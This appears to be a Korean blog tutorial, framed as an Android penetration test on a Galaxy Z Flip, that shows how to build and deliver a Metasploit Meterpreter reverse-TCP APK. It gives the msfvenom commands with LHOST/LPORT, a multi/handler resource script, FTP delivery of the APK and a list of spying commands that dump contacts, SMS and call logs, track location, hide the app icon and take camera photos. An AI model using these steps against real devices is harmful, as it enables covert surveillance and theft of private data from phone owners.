안드로이드 침투테스트(갤럭시Z플립2)

 

안드로이드 삼성폰 침투테스트(갤럭시Z플립2)

 

안드로이드 버전은 12입니다. 

 

-목차-
1. 안드로이드 환경 구축
2. 안드로이드 악성코드 제작 
3. 안드로이드 악성코드 실행
4. 안드로이드 Commands

---

1. 안드로이드 환경 구축

 

 

ipDISK 어플 설치

 

많은 어플이 있지만, ipDISK어플을 사용했습니다. 

 

 

 

NAS서버 구축

 

 

ping 확인

 

# ping -c 2 192.168.0.213

 

 

---

2. 안드로이드 악성코드 제작 

 

 

아키텍쳐와 플랫폼 보기

 

# msfvenom --payload=android/meterpreter_reverse_tcp -o a
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 80944 bytes
Saved as: a

 

일부러 빼놓고 페이로드옵션으로만 msfvenom을 실행하면 정보를 알 수 있음.

 

플랫폼은 Android, 아키텍쳐는 dalvik라고 나오네요. 버전 11이후 바뀜 유의

 

 

악성코드생성

 

# msfvenom --arch=dalvik --platform=android --payload=android/meterpreter_reverse_tcp LHOST=192.168.0.59 LPORT=443 -o and_dalvik.apk
# cat > android.rc
use exploit/multi/handler
set payload android/meterpreter_reverse_tcp
set LHOST 192.168.0.59
set LPORT 443
exploit
# mv and_dalvik.apk /srv/ftp
# msfconsole -q -r android.rc

 

---

 

3. 안드로이드 악성코드 실행

 

설치

 

 

 

msfconsole 실행

 

# msfconsole -q -r android.rc

 

실행후 다운로드한 and_dalvik을 시작하면 미터프리터가 실행됩니다.

 

 

---

 

4. 안드로이드 Commands

 

Android Commands

 

 

• dump_calllog
  통화 로그 가져오기
• dump_contacts
  연락처 목록 가져오기
• dump_sms
  SMS 메시지 받기
• geolocate
  현재 위도-경도 가져오기
• hide_app_icon
  런처에서 앱 아이콘 숨기기
• interval_collect
  간격 수집 기능 관리
• send_sms
  대상 세션에서 SMS를 보냅니다.
• set_audio_mode
  벨소리 모드 설정
• sqlite_query
  스토리지에서 SQLite 데이터베이스 쿼리
• wakelock Wakelock
  활성화/비활성화
• wlan_gelocate
  WLAN 정보를 사용하여 현재 위도-경도 가져오기
• smapcam
  캠 사진찍기

 

흔적없이 실행되는게 소름 ㄷ ㄷ ㄷ

 

---

문의는 댓글 남겨주세요